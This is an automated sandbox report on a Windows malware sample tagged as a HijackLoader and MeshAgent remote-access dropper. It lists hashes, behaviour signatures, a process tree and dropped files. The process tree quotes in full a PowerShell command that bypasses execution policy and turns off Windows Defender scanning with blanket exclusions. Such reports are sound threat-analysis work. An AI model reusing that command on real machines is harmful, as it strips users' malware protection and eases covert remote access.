Analysis

  • max time kernel
    94s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24-09-2024 11:28

General

  • Target

    2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe

  • Size

    19.0MB

  • MD5

    e664e32eae75f70aca3b95397beb8706

  • SHA1

    ca649ca8a6f15876d56f7a3491f7435f5b0df8ef

  • SHA256

    d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402

  • SHA512

    d522171534431ae1cc9c3536845f3404d89cadbd3e8481ac64c5f3b98b16d0625d6619b00e23e579b575dd99498bd43e6d1b6c07da81839337e9897b901f672a

  • SSDEEP

    393216:ZGbYHohSnaqtvylAjWZ0Xq9YLuxMfCVb2:gbYHPhtvylAjWZ0Xq9YLuxMfCVK

Signatures

  • Detects MeshAgent payload (1 IoC)
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request (3 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)

    Using powershell.exe command.

  • Sets service image path in registry (2 TTPs, 1 IoC)
  • Executes dropped EXE (2 IoCs)
  • Checks installed software on the system (1 TTP)

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory (64 IoCs)
  • Modifies data under HKEY_USERS (52 IoCs)
  • Modifies system certificate store (2 TTPs, 3 IoCs)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of WriteProcessMemory (30 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2244
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4436
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5072
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:1904
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:1768
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:1876
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:716
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4224
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4864
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:4592
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:4284
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      PID:2848

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          e89c193840c8fb53fc3de104b1c4b092

          SHA1

          8b41b6a392780e48cc33e673cf4412080c42981e

          SHA256

          920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

          SHA512

          865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o45equpc.ovp.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\naver\naver.exe

          Filesize

          5.3MB

          MD5

          34ea939943d6809e2a7058a2e45c8add

          SHA1

          63a80e2dc69179e51234ba962b3cc66b8a9a8597

          SHA256

          54db74abc8fd588cf08c0411d052fff4e81b4235d5326c2fd9dbb94152636a84

          SHA512

          e3732baaac1d8840b3a8a9a55b728a859f4aefe86a1ba162acaf4418c14224fd77c8f7ca4a294f6cbeaa5a03724d016760169fec6c735fcc0af95d0d98deb35e

        • C:\Users\Admin\AppData\Local\naver\naver.msh

          Filesize

          22KB

          MD5

          2dd515ea546a81398d94dd15e3b4d55c

          SHA1

          eb0b0fca721a296906166b7e972559b87353b726

          SHA256

          becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

          SHA512

          439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

        • memory/2244-30-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/2244-22-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/2244-24-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/2244-1-0x00007FF945253000-0x00007FF945255000-memory.dmp

          Filesize

          8KB

        • memory/4436-26-0x0000018BC1B40000-0x0000018BC1B84000-memory.dmp

          Filesize

          272KB

        • memory/4436-27-0x0000018BC1F90000-0x0000018BC2006000-memory.dmp

          Filesize

          472KB

        • memory/4436-31-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-32-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-33-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-25-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-23-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-54-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-21-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-7-0x0000018BC1090000-0x0000018BC10B2000-memory.dmp

          Filesize

          136KB